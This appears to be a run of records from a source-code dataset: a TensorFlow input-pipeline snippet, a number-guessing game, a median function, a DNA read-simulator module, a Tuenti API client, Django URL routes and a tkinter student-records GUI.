labels_placeholder: labels})\n\n\n# 3.Consuming TFRecord data\n# Creates a dataset that reads all of the examples from two files.\nfilenames = [\"./train.tfrecords\"]\ndataset = tf.data.TFRecordDataset(filenames)\n\n\n# 4.use a tf.placeholder(tf.string) to represent the filenames\nfilenames = tf.placeholder(tf.string, shape=[None])\ndataset = tf.data.TFRecordDataset(filenames)\ndataset = dataset.map(...) # Parse the record into tensors.\ndataset = dataset.repeat() # Repeat the input indefinitely.\ndataset = dataset.batch(32)\niterator = dataset.make_initializable_iterator()\n# You can feed the initializer with the appropriate filenames for the current\n# phase of execution, e.g. training vs. 
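evaluation; feed whichever filename list the run needs.\n# Hedged aside (same pattern, hypothetical file names):\n# test_filenames = ['/var/data/test1.tfrecord']\n# sess.run(iterator.initializer, feed_dict={filenames: test_filenames})\n# The list fed at initialization decides which split the pipeline reads,\n# e.g. training vs. 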
validation.\n# Initialize `iterator` with training data.\ntraining_filenames = [\"/var/data/file1.tfrecord\", \"/var/data/file2.tfrecord\"]\nsess.run(iterator.initializer, feed_dict={filenames: training_filenames})\n# Initialize `iterator` with validation data.\nvalidation_filenames = [\"/var/data/validation1.tfrecord\", ...]\nsess.run(iterator.initializer, feed_dict={filenames: validation_filenames})\n\n\n# 5.Consuming text data\nfilenames = [\"/var/data/file1.txt\", \"/var/data/file2.txt\"]\ndataset = tf.data.TextLineDataset(filenames)\n\n# 6.use Dataset.flat_map() to create a nested Dataset for each file.\nfilenames = [\"/var/data/file1.txt\", \"/var/data/file2.txt\"]\ndataset = tf.data.Dataset.from_tensor_slices(filenames)\n# Use `Dataset.flat_map()` to transform each file as a separate nested dataset,\n# and then concatenate their contents sequentially into a single \"flat\" dataset.\n# * Skip the first line (header row).\n# * Filter out lines beginning with \"#\" (comments).\ndataset = dataset.flat_map(\n lambda filename: (\n tf.data.TextLineDataset(filename)\n .skip(1)\n .filter(lambda line: tf.not_equal(tf.substr(line, 0, 1), \"#\"))))\n\n\n# 7.Parsing tf.Example protocol buffer messages\n# Transforms a scalar string `example_proto` into a pair of a scalar string and\n# a scalar integer, representing an image and its label, respectively.\ndef _parse_function(example_proto):\n features = {\"image\": tf.FixedLenFeature((), tf.string, default_value=\"\"),\n \"label\": tf.FixedLenFeature((), tf.int64, default_value=0)}\n parsed_features = tf.parse_single_example(example_proto, features)\n return parsed_features[\"image\"], parsed_features[\"label\"]\n
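# NOTE: tf.FixedLenFeature only supports tf.float32, tf.int64 and tf.string, so the integer label above is declared as tf.int64 (tf.int32 would make tf.parse_single_example raise an error).\n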
guesses\")\nprint()\nprint(\"You can choose how many rounds you want to play and the numbers you would like to guess between\")\nprint()\nprint(\"At the end of the game your best, worst, and average score will be displayed\")\nprint()\nprint(\"Good Luck!!\")\nprint()\n\n\nkeep_going = \"\"\nwhile keep_going == \"\":\n\n rounds = int_check(\"How many rounds would you like to play? \", 1)\n lowest = int_check(\"Please enter a low number \")\n highest = int_check(\"Please enter a high number \", lowest + 1)\n range = highest - lowest + 1\n max_raw = math.log2(range) # finds maximum number of guesses using binary search\n max_upped = math.ceil(max_raw) # rounds up\n max_guesses = max_upped + 1\n print(\"You have {} guesses\".format(max_guesses))\n\n\n game_stats = []\n already_guessed = []\n\n num_won = 0\n rounds_played = 0\n\n while rounds_played < rounds:\n print(\"Round {}\".format(rounds_played + 1))\n\n guess = \"\"\n guesses_left = max_guesses\n secret = random.randint(lowest, highest)\n\n while guess != secret and guesses_left >= 1:\n\n guess = int_check(\"Guess the number \", lowest, highest)\n if guess in already_guessed:\n print(\"You have already guessed that number! Please try again. \"\n \"You still have {} guesses left\".format(guesses_left))\n continue\n guesses_left -= 1\n already_guessed.append(guess)\n\n\n # if user has guess left\n if guesses_left >= 1:\n\n if guess > secret:\n hl_statement(\"vv Too high, guess a lower number vv\", \"v\" )\n print(\"you have {} guesses left\".format(guesses_left))\n elif guess < secret:\n hl_statement(\"^^ Too low, guess a higher number ^^\", \"^\")\n print(\"you have {} guesses left\".format(guesses_left))\n\n # if user is out of guesses\n else:\n if guess < secret:\n print(\"Too low\")\n elif guess > secret:\n print(\"To high\")\n\n if guess == secret:\n # if user has guessed right the first time...\n if guesses_left == max_guesses - 1:\n hl_statement(\"** Amazing! You got it first try **\", \"*\")\n num_won += 1\n # if user has had more than one guess\n else:\n hl_statement(\"** Congratulations! You guessed the number **\", \"*\")\n print(\"you had {} guesses left\".format(guesses_left))\n num_won += 1\n else:\n print(\"Sorry, you have no guesses left. Game Over\")\n guesses_left -= 1 # Penalty point for losing\n\n game_stats.append(max_guesses - guesses_left)\n print(\"Won: {} \\t | \\t Lost: {}\".format(num_won, rounds_played - num_won + 1))\n rounds_played += 1\n already_guessed = []\n\n # print each rounds outcome...\n print()\n print(\"*** Game Scores ***\")\n list_count = 1\n for item in game_stats:\n\n # indicates if game has been won or lost\n if item > max_guesses:\n status = \"lost\"\n else:\n status = \"won\"\n\n print(\"Round {}: {} \".format(list_count, item))\n list_count += 1\n\n # Calculate (and then print) statistics\n game_stats.sort()\n best = game_stats[0] # first item in sorted list\n worst = game_stats[-1] # last item in sorted list\n average = sum(game_stats)/len(game_stats)\n\n print()\n print(\"*** Summary Statistics ***\")\n print(\"Best: {}\".format(best))\n print(\"Worst: {}\".format(worst))\n print(\"Average: {:.2f}\".format(average))\n\n print()\n keep_going = input(\"Press to play again or any key to quit \")\n print()\n\nprint(\"Thank you for playing. 
Good bye\")\n","sub_path":"14_final_version.py","file_name":"14_final_version.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"634045402","text":"\"\"\"\nWrite a function called median that takes a list as an input\nand returns the median value of the list.\nThe median is the middle number in a sorted sequence of numbers.\nIf you are given a sequence with an even number of elements,\nyou must average the two elements surrounding the middle.\n\"\"\"\ndef median(num_lst):\n sort_lst = sorted(num_lst)\n if len(num_lst) % 2 == 0:\n middle_num = (sort_lst[int(len(num_lst) / 2 - 1)]\n + sort_lst[int(len(num_lst) / 2)]) / 2\n else:\n middle_num = sort_lst[int(len(num_lst) / 2)]\n\n return middle_num\n\nnum_lst = [4, 5, 5, 4]\nprint(median(num_lst))","sub_path":"Unit08_Loops/median.py","file_name":"median.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"240602442","text":"#!/usr/bin/env python\n\n# usage: ./cmd \n\nimport sys\nimport random\nimport math\nfrom random import shuffle\nimport time\nimport datetime\n\n# my library\nimport mut\nimport common\n\n\nMAX_LEN = 160000\nMIN_LEN = 20\n\n\nchr_name = ''\n \ndef get_chr( fasta, seq, read_len ) :\n\n chr_name = ''\n\n while True :\n line = fasta.readline().strip()\n if line.startswith('>') :\n chr_name = line.strip().strip('>').split(' ')[0]\n #print >> sys.stderr, chr_name\n break\n elif len(line) == 0 :\n break\n else :\n seq += line\n #print >> sys.stderr, '2', line\n\n return chr_name, seq\n\ndef get_more_lines( fasta, seq, read_len, base_per_line ) :\n\n if len(seq) < read_len : \n r = int( math.ceil( read_len/float(base_per_line) ) )\n for c in range(r) :\n line = fasta.readline().strip()\n seq = seq + fasta.readline().strip()\n else : \n pass\n\n return seq\n\ndef readsim( sub_cmd, tech, prefix, ref_file, rev_strd, replace, read_mu, read_dist, cov_mu, \n sub_mu, in_mu, del_mu, times ) :\n\n common.intro_readsim( tech, ref_file, read_mu, read_dist, cov_mu, \n sub_mu, in_mu, del_mu ) \n\n fasta = open(ref_file)\n orientation = ''\n i = 0\n read_num = 0\n\n ################################################################## \n firstline = fasta.readline().strip()\n chr = firstline.split()[0].strip('>').split(':')[0]\n\n ################################################################## \n print >> sys.stderr, \"{0} {1} reading {2}\".format( common.INFO_002, datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ref_file )\n seq = ''\n for line in fasta :\n seq += line.strip()\n\n print >> sys.stderr, \"{0} {1} done.\".format( common.INFO_002, datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S') )\n ################################################################## \n if read_dist == 'uniform' : \n\n lens = [read_mu]\n\n elif read_dist == 'normal' or read_dist == 'exp' :\n\n lens = []\n target = cov_mu * len( seq ) \n s = 0\n\n print >> sys.stderr, \"{0} {1} generating length given distribution.\".format( common.INFO_002, datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S') )\n\n if read_dist == 'normal' : \n while s < target : \n l = common.get_num_from_normal( read_mu ) \n lens.append( l ) \n s += l\n\n elif read_dist == 'exp' : \n while s < target : \n l = common.get_num_from_exp( read_mu )\n lens.append( l ) \n s += l\n else : \n pass \n \n else : # with read_dist file includes 
read lengths\n\n with open(read_dist) as f:\n lens = [ int(x.strip()) for x in f.readlines() ]\n\n print >> sys.stderr, \"{0} Randomly mixing read lengths to prevent any bias\".format( common.INFO_011 )\n shuffle(lens)\n\n ################################################################## \n [forward, backward] = mut.sim_reads_given_chr( sub_cmd, prefix, seq, lens, \n rev_strd, replace, read_mu, read_dist, cov_mu,\n sub_mu, in_mu, del_mu, times ) \n\n \n # if ends\n\n print >> sys.stderr, \"{0} Total {1} reads are generated; {2} is forward, {3} is reversed\".format( common.INFO_010, forward + backward, forward, backward )\n fasta.close()\n\n\n###############################################################################\n \ndef qualfromfa( fasta ) : \n\n fa = open( fasta, 'r' ) \n out_fq = open( fasta.rstrip('a') + 'b', 'w' )\n out_fb = open( fasta.rstrip('a') + 'q', 'w' )\n\n read_name = ''\n uplmt = MAX_LEN\n lwlmt = MIN_LEN\n\n for line in fa : \n \n if line.startswith('>') : \n read_name = line\n else :\n if len( line.strip() ) == 0 :\n # remove zero size reads\n pass\n #elif len( line.strip() ) < lwlmt : # since CA can't deal with reads longer than lwlmt\n # pass\n elif len( line.strip() ) > uplmt : # since CA can't deal with reads longer than uplmt\n out_fb.write( read_name )\n out_fb.write( line[:uplmt] + '\\n' )\n out_fq.write( read_name )\n out_fq.write( 'M'*uplmt + '\\n' )\n else : \n out_fb.write( read_name )\n out_fb.write( line )\n out_fq.write( read_name )\n out_fq.write( 'M'*len( line.strip() ) + '\\n' )\n\n out_fb.close()\n out_fq.close()\n fa.close()\n\n\n###############################################################################\n# muate each reads\ndef mutate( sub_cmd, tech, prefix, ref_file, replace, copy, sub_mu, in_mu, del_mu ) :\n\n read_mu = 0\n read_dist = ''\n\n common.intro( tech, ref_file, read_mu, read_dist, copy, sub_mu, in_mu, del_mu ) \n\n fasta = open(ref_file)\n seq = ''\n firstline = fasta.readline().strip() # skip the first line\n i = 0\n\n if len( firstline.split(' ') ) == 2 : \n print >> sys.stderr, firstline\n init = int( firstline.split(' ')[1].split(':')[1].split('-')[0] ) # skip the first line '>'\n\n elif len( firstline.split(' ') ) == 3 : \n init = 1\n else : \n init = 0\n\n \n pos = 0\n read_num = 0\n\n if sub_cmd == \"fq\" : \n out_fq = open( prefix + \".fastq\", 'w' )\n print >> sys.stderr, \"{0} {1} are created\".format( common.INFO_002, prefix + \".fastq\" )\n elif sub_cmd == \"fa\" : \n out_fa = open( prefix + \".fasta\", 'w' )\n print >> sys.stderr, \"{0} {1} are created\".format( common.INFO_003, prefix + \".fasta\" )\n #elif sub_cmd == \"fafq\" : # depreciated from v1.6\n # out_fa = open( prefix + \".fa\", 'w' )\n # out_fq = open( prefix + \".fq\", 'w' )\n # print >> sys.stderr, \"{0} {1}, {2} are created\".format( common.INFO_004, prefix + \".fa\", prefix + \".fq\" )\n else : \n print >> sys.stderr, \"{0} sub command {1} is NOT supported\".format( common.ERR_001, sub_cmd )\n\n total_base = 0\n i = 0\n\n #readlines() would be considered\n\n # take one long reads\n\n for line in fasta : \n seq += line.strip()\n\n #print len(seq)\n #out_fa.write(seq + '\\n')\n\n for i in range( 0, copy ) : \n orientation, mut_seq, mut_qual = common.mutate( seq, \"M\"*len(seq), sub_mu, in_mu, del_mu, \"off\", replace )\n if sub_cmd == \"fa\" : \n out_fa.write(mut_seq + '\\n')\n out_fa.write(mut_qual + '\\n')\n else : \n print >> sys.stderr, \"{0} sub command {1} is NOT supported\".format( common.ERR_001, sub_cmd )\n \n\n if sub_cmd == \"fq\" : \n 
out_fq.close()\n elif sub_cmd == \"fa\" : \n out_fa.close()\n elif sub_cmd == \"fafq\" : \n out_fa.close()\n out_fq.close()\n \n fasta.close()\n\n\n","sub_path":"readsim/readsim-1.6/src/sim.py","file_name":"sim.py","file_ext":"py","file_size_in_byte":7033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641513058","text":"#!/bin/env/python\n\n # tuentiAPI Class\n # Python implementation of the PHP API by Sergios Cruz aka scromega (scr.omega at gmail dot com) http://scromega.net\n #\n # More info:\n # http://scromega.net/7-accediendo-a-la-api-cerrada-de-tuenti.html\n \n \n # Modo de uso:\n #\n # from tuentiAPI import tuentiAPI\n # api = tuentiAPI(\"cani@hotmail.com\",\"1234\") # (tu usuario y password)\n # print api.request(\"getFriends\",{})\n # friends,inbox = api.mrequest( ((\"getFriends\",{}),(\"getInbox\",{})) )\n # print friends\n # print inbox\n\nimport simplejson\nimport hashlib\nimport httplib2\n\nclass tuentiAPI:\n\tuser_data = {}\n\tdef __init__(self,email,pw):\n\t\traw_response = self.http(self.json(((\"getChallenge\",{\"type\":\"login\"}),)))\n\t\tresponse = simplejson.loads(raw_response)[0]\n\t\tpasscode = self.md5(response['challenge']+self.md5(pw))\n\t\tappkey = ('MDI3MDFmZjU4MGExNWM0YmEyYjA5MzRkODlm'+\n\t\t 'Mjg0MTU6MC4xMzk0ODYwMCAxMjYxMDYwNjk2')\n\t\traw_response = self.http(self.json((('getSession',{\n\t\t\t\"passcode\":passcode,\n\t\t\t\"application_key\":appkey,\n\t\t\t\"timestamp\":response['timestamp'],\n\t\t\t\"seed\":response['seed'],\n\t\t\t\"email\":email\n\t\t}),)))\n\t\tself.user_data = simplejson.loads(raw_response)[0]\n\n\tdef md5(self,str):\n\t\treturn hashlib.md5(str).hexdigest()\n\tdef http(self,data):\n\t\theaders = {\"Content-length\":str(len(data))}\n\t\turl = 'http://api.tuenti.com/api/'\n\t\thttp = httplib2.Http()\n\t\trequest, reply = http.request(url,'POST',headers = headers,body = data)\n\t\treturn reply\n\tdef json(self,iterable):\n\t\tcalls = []\n\t\trequest = {}\n\t\tfor k in iterable:\n\t\t\tcalls.append(k[:2])\n\t\t\n\t\tif self.user_data.get(\"session_id\",False):\n\t\t\trequest['session_id'] = self.user_data['session_id']\n\t\trequest['version'] = '0.4'\n\t\trequest['requests'] = calls\n\t\treturn simplejson.dumps(request)\n\tdef request(self,method, parameters={}):\n\t\treturn self.mrequest(((method, parameters),))[0]\n\tdef mrequest(self,iterable):\n\t\ttmp = self.json(iterable)\n\t\ttmp = self.http(tmp)\n\t\ttmp = simplejson.loads(tmp)\n\t\treturn tmp\n\n","sub_path":"tuentiAPI.py","file_name":"tuentiAPI.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"557947348","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.availability, name=\"availability\"),\n path('servicemen-order/', views.ServicemenOrderListView, name=\"servicemen_order\"),\n path('servicemen-order-detail//', views.ServicemenOrderDetailView.as_view(), name=\"servicemen_order_detail\"),\n path('servicemen-order-status//', views.ServicemenOrderStatuChangeView.as_view(), name=\"servicemen_orderstatus_change\"),\n path('servicemen-new-order/', views.ServicemenNewOrderListView.as_view(), name=\"servicemen_new_order\"),\n\n]","sub_path":"servicemen/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"359925310","text":"import tkinter as tk\n\nfrom Tables.Student import Student\n\nfrom tk_extension.multilistBox import MultiListBox\n\n\nclass StudentPage(tk.Frame):\n \"\"\"\n Main Student Page\n \"\"\"\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.columnconfigure([x for x in range(7)], minsize=250)\n self.rowconfigure([x for x in range(9)], minsize=100)\n self.controller = controller\n self.main_label()\n self.student_listbox()\n self.refresh_button()\n self.buttons()\n\n def main_label(self):\n \"\"\"create student main label\n \"\"\"\n label = tk.Label(\n self,\n text=\"Student Page\",\n font=self.controller.title_font\n )\n label.grid(row=0, column=6, sticky=\"nsew\", padx=5, pady=5)\n\n def buttons(self):\n \"\"\"create room page buttons\n \"\"\"\n # Return Home Button\n btn_return = tk.Button(\n self,\n text=\"Home\",\n command=lambda: self.controller.show_frame(\"StartPage\"),\n font=self.controller.normal_font,\n )\n btn_return.grid(row=4, column=6, sticky=\"nsew\", padx=5, pady=5)\n # Create Student Button\n btn_create = tk.Button(\n self,\n text=\"Create Student\",\n command=lambda: self.controller.show_frame(\"CreateStudentPage\"),\n font=self.controller.normal_font,\n )\n btn_create.grid(row=1, column=6, sticky=\"nsew\", padx=5, pady=5)\n # Delete Student Button\n btn_delete = tk.Button(\n self,\n text=\"Delete Student\",\n command=lambda: self.delete_student(),\n font=self.controller.normal_font,\n )\n btn_delete.grid(row=2, column=6, sticky=\"nsew\", padx=5, pady=5)\n # Change Student Button\n btn_change = tk.Button(\n self,\n text=\"Change Student\",\n command=lambda: self.update_student(),\n font=self.controller.normal_font,\n )\n btn_change.grid(row=3, column=6, sticky=\"nsew\", padx=5, pady=5)\n\n def student_listbox(self):\n \"\"\"create student listbox\n \"\"\"\n data = [\n ('id', 10),\n ('name', 15),\n ('second name', 15),\n ('lastname', 15),\n ('ssn', 15),\n ('email', 20),\n ('field of study', 20),\n ('department', 20),\n ('place of residence', 30)\n ]\n\n self.list_students = MultiListBox(master=self, data=data)\n self.refresh()\n self.list_students.grid(\n row=0,\n column=0,\n columnspan=6,\n rowspan=9,\n sticky=\"nswe\",\n padx=5,\n pady=5\n )\n\n def delete_student(self):\n \"\"\"create student listbox\n \"\"\"\n idx = self.list_students.index(tk.ACTIVE)\n del_student = self.controller.students.pop(idx)\n\n del_student.delete(self.controller.db)\n self.delete_from_groups(del_student)\n self.controller.db.commit_conn()\n\n del del_student\n # config\n self.controller.frames[\"LabStudentPage\"].refresh_student_listbox()\n self.controller.frames[\"ExeStudentPage\"].refresh_student_listbox()\n self.controller.frames[\"YearStudentPage\"].refresh_student_listbox()\n self.restart()\n\n def delete_from_groups(self, 
student):\n \"\"\"func delete student from groups\n\n Args:\n student (Student): student which we want delete\n \"\"\"\n # exe group\n for exe_group in self.controller.exe_groups:\n if student in exe_group.get_students():\n exe_group.delete_student(student, self.controller.db)\n # lab group\n for lab_group in self.controller.lab_groups:\n if student in lab_group.get_students():\n lab_group.delete_student(student, self.controller.db)\n # year group\n for year_group in self.controller.year_groups:\n if student in year_group.get_students():\n year_group.delete_student(student, self.controller.db)\n\n def update_student(self):\n \"\"\"func set student to update and change\n page to ChangeStudentPage\n \"\"\"\n idx = self.list_students.index(tk.ACTIVE)\n student = self.controller.students[idx]\n\n self.controller.frames[\"ChangeStudentPage\"].set_student(student)\n self.controller.frames[\"ChangeStudentPage\"].fill_entry()\n self.controller.show_frame(\"ChangeStudentPage\")\n\n def restart(self):\n \"\"\"func restart frame\n \"\"\"\n self.refresh()\n self.controller.show_frame(\"StudentPage\")\n\n def refresh_button(self):\n \"\"\"create refresh button\n \"\"\"\n btn_refresh = tk.Button(\n master=self,\n text=\"refresh\",\n command=lambda: self.restart(),\n font=self.controller.normal_font,\n )\n btn_refresh.grid(row=8, column=6, sticky=\"nsew\", padx=5, pady=5)\n\n def refresh(self):\n \"\"\"func refresh student listbox\n \"\"\"\n self.list_students.delete(0, tk.END)\n for i, student in enumerate(self.controller.students):\n try:\n field = student.get_field_of_study().get_name()\n try:\n department = student.get_field_of_study().get_department().get_name()\n except AttributeError:\n department = \"NULL\"\n except AttributeError:\n field = \"NULL\"\n department = \"NULL\"\n\n output = (\n student.get_id(),\n student.get_name(),\n student.get_sec_name(),\n student.get_lastname(),\n student.get_ssn(),\n student.get_email(),\n field,\n department,\n student.get_place_of_residence()\n )\n self.list_students.insert(i, output)\n\n\nclass CreateStudentPage(tk.Frame):\n \"\"\"\n Page where we can create student\n \"\"\"\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.columnconfigure([x for x in range(9)], minsize=250)\n self.rowconfigure([x for x in range(18)], minsize=50)\n self.controller = controller\n self.main_label()\n self.return_button()\n self.home_button()\n self.name_entry()\n self.sec_name_entry()\n self.lastname_entry()\n self.ssn_entry()\n self.email_entry()\n self.place_entry()\n self.field_listbox()\n self.submit()\n\n def main_label(self):\n \"\"\"create student main label\n \"\"\"\n label = tk.Label(\n self,\n text=\"Create Student\",\n font=self.controller.title_font\n )\n label.grid(\n row=0,\n column=0,\n rowspan=1,\n columnspan=4,\n sticky=\"news\",\n padx=5,\n pady=5\n )\n\n def return_button(self):\n \"\"\"create return button\n \"\"\"\n btn_return = tk.Button(\n self,\n text=\"return\",\n command=lambda: self.return_refresh(),\n font=self.controller.normal_font,\n )\n btn_return.grid(\n row=16,\n column=0,\n rowspan=2,\n columnspan=2,\n sticky=\"news\",\n padx=5,\n pady=5\n )\n\n def home_button(self):\n \"\"\"create home button\n \"\"\"\n btn_home = tk.Button(\n self,\n text=\"Home\",\n command=lambda: self.home_refresh(),\n font=self.controller.normal_font,\n )\n btn_home.grid(\n row=16,\n column=2,\n rowspan=2,\n columnspan=2,\n sticky=\"news\",\n padx=5,\n pady=5\n )\n\n def return_refresh(self):\n \"\"\"func change page to StudentPage\n 
\"\"\"\n self.refresh()\n self.controller.show_frame(\"StudentPage\")\n\n def home_refresh(self):\n \"\"\"func change page to StartPage\n \"\"\"\n self.refresh()\n self.controller.show_frame(\"StartPage\")\n\n def refresh(self):\n \"\"\"clear all entries\n \"\"\"\n self.e_name.delete(0, tk.END)\n self.e_lastname.delete(0, tk.END)\n self.e_email.delete(0, tk.END)\n self.e_sec_name.delete(0, tk.END)\n self.e_place.delete(0, tk.END)\n self.e_ssn.delete(0, tk.END)\n\n def name_entry(self):\n \"\"\"create entry for name with label\n \"\"\"\n l_name = tk.Label(\n master=self,\n text=\"name\",\n font=self.controller.normal_font,\n anchor=tk.W,\n relief=tk.RAISED\n )\n l_name.grid(\n row=1,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n self.e_name = tk.Entry(\n master=self,\n font=self.controller.entry_font\n )\n self.e_name.grid(\n row=2,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n def sec_name_entry(self):\n \"\"\"create entry for second name with label\n \"\"\"\n l_sec_name = tk.Label(\n master=self,\n text=\"second name\",\n font=self.controller.normal_font,\n anchor=tk.W,\n relief=tk.RAISED\n )\n l_sec_name.grid(\n row=3,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n self.e_sec_name = tk.Entry(\n master=self,\n font=self.controller.entry_font\n )\n self.e_sec_name.grid(\n row=4,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n def lastname_entry(self):\n \"\"\"create entry for lastname with label\n \"\"\"\n l_lastname = tk.Label(\n master=self,\n text=\"lastname\",\n font=self.controller.normal_font,\n anchor=tk.W,\n relief=tk.RAISED\n )\n l_lastname.grid(\n row=5,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n self.e_lastname = tk.Entry(\n master=self,\n font=self.controller.entry_font\n )\n self.e_lastname.grid(\n row=6,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n def ssn_entry(self):\n \"\"\"create entry for ssn with label\n \"\"\"\n l_ssn = tk.Label(\n master=self,\n text=\"ssn\",\n font=self.controller.normal_font,\n anchor=tk.W,\n relief=tk.RAISED\n )\n l_ssn.grid(\n row=7,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n self.e_ssn = tk.Entry(\n master=self,\n font=self.controller.entry_font\n )\n self.e_ssn.grid(\n row=8,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n def email_entry(self):\n \"\"\"create entry for email with label\n \"\"\"\n l_email = tk.Label(\n master=self,\n text=\"email\",\n font=self.controller.normal_font,\n anchor=tk.W,\n relief=tk.RAISED\n )\n l_email.grid(\n row=9,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n self.e_email = tk.Entry(\n master=self,\n font=self.controller.entry_font\n )\n self.e_email.grid(\n row=10,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n def place_entry(self):\n \"\"\"create entry for place of residence with label\n \"\"\"\n l_place = tk.Label(\n master=self,\n text=\"place of residence\",\n font=self.controller.normal_font,\n anchor=tk.W,\n relief=tk.RAISED\n )\n l_place.grid(\n row=11,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n self.e_place = tk.Entry(\n master=self,\n font=self.controller.entry_font\n )\n self.e_place.grid(\n row=12,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n def field_listbox(self):\n \"\"\"create field of study listbox for Student Page\n \"\"\"\n l_field = tk.Label(\n 
master=self,\n text=\"field of study\",\n font=self.controller.normal_font,\n relief=tk.RAISED\n )\n l_field.grid(\n row=0,\n column=4,\n rowspan=1,\n columnspan=3,\n sticky=\"nswe\",\n pady=5,\n padx=5\n )\n\n data = [\n ('field of study', 20),\n ('department', 20)\n ]\n\n self.list_field = MultiListBox(master=self, data=data)\n self.list_field.grid(\n row=1,\n column=4,\n rowspan=17,\n columnspan=3,\n sticky=\"nswe\",\n pady=5,\n padx=5\n )\n self.refresh_field_listbox()\n\n def refresh_field_listbox(self):\n \"\"\"refresh field of study listbox\n \"\"\"\n self.list_field.delete(0, tk.END)\n for i, field in enumerate(self.controller.fields):\n try:\n dept = field.get_department().get_name()\n except AttributeError:\n dept = \"NULL\"\n\n output = (\n field.get_name(),\n dept\n )\n self.list_field.insert(i, output)\n\n def submit(self):\n \"\"\"create submit button\n \"\"\"\n sub_btn = tk.Button(\n master=self,\n text=\"submit\",\n command=lambda: self.create_student(),\n font=self.controller.normal_font,\n )\n sub_btn.grid(\n row=14,\n column=0,\n rowspan=2,\n columnspan=4,\n sticky=\"nswe\",\n pady=5,\n padx=5\n )\n\n def create_student(self):\n \"\"\"func create new student and config other frames\n \"\"\"\n try:\n idx = self.list_field.index(tk.ACTIVE)\n temp_field = self.controller.fields[idx]\n except IndexError:\n temp_field = None\n\n try:\n ssn = int(self.e_ssn.get())\n except ValueError:\n ssn = 'NULL'\n\n self.controller.students.append(Student(\n name=self.e_name.get(),\n sec_name=self.e_sec_name.get(),\n lastname=self.e_lastname.get(),\n ssn=ssn,\n email=self.e_email.get(),\n field_of_study=temp_field,\n place_of_residence=self.e_place.get()\n ))\n\n # insert to db\n self.controller.students[-1].insert(self.controller.db)\n self.controller.db.commit_conn()\n # refresh Groups frames\n self.controller.frames[\"LabStudentPage\"].refresh_student_listbox()\n self.controller.frames[\"ExeStudentPage\"].refresh_student_listbox()\n self.controller.frames[\"YearStudentPage\"].refresh_student_listbox()\n # refresh self\n self.refresh()\n self.controller.frames[\"StudentPage\"].restart()\n\n\nclass ChangeStudentPage(CreateStudentPage):\n \"\"\"\n Page where we can update Student\n \"\"\"\n def __init__(self, parent, controller):\n CreateStudentPage.__init__(self, parent, controller)\n if controller.students:\n self.student = controller.students[0]\n\n def main_label(self):\n \"\"\"create update student main label\n \"\"\"\n label = tk.Label(\n self,\n text=\"Change Student\",\n font=self.controller.title_font\n )\n label.grid(\n row=0,\n column=0,\n rowspan=1,\n columnspan=4,\n sticky=\"news\",\n padx=5,\n pady=5\n )\n\n def submit(self):\n \"\"\"crate submit button\n \"\"\"\n sub_btn = tk.Button(\n master=self,\n text=\"submit\",\n command=lambda: self.update_student(),\n font=self.controller.normal_font,\n )\n sub_btn.grid(\n row=14,\n column=0,\n rowspan=2,\n columnspan=4,\n sticky=\"news\",\n padx=5,\n pady=5\n )\n\n def fill_entry(self):\n \"\"\"fill all entries with self attrs\n \"\"\"\n self.e_name.insert(tk.END, str(self.student.get_name()))\n self.e_lastname.insert(tk.END, str(self.student.get_lastname()))\n self.e_email.insert(tk.END, str(self.student.get_email()))\n self.e_sec_name.insert(tk.END, str(self.student.get_sec_name()))\n self.e_place.insert(tk.END, str(self.student.get_place_of_residence()))\n self.e_ssn.insert(tk.END, str(self.student.get_ssn()))\n\n def set_student(self, student):\n \"\"\"set student instance\n\n Args:\n student (Student): student which we want 
update\n \"\"\"\n self.student = student\n\n def update_student(self):\n \"\"\"func update student and config other frames\n \"\"\"\n self.set_attr_student()\n self.student.update(self.controller.db)\n self.controller.db.commit_conn()\n\n # config after update\n self.controller.frames[\"LabStudentPage\"].refresh_student_listbox()\n self.controller.frames[\"ExeStudentPage\"].refresh_student_listbox()\n self.controller.frames[\"YearStudentPage\"].refresh_student_listbox()\n self.refresh()\n self.controller.frames[\"StudentPage\"].restart()\n\n def set_attr_student(self):\n \"\"\"changes attrs of student\n \"\"\"\n try:\n idx = self.list_field.index(tk.ACTIVE)\n field = self.controller.fields[idx]\n self.student.set_field_of_study(field)\n except IndexError:\n pass\n\n self.student.set_name(self.e_name.get())\n self.student.set_sec_name(self.e_sec_name.get())\n self.student.set_lastname(self.e_lastname.get())\n self.student.set_ssn(int(self.e_ssn.get()))\n self.student.set_email(self.e_email.get())\n 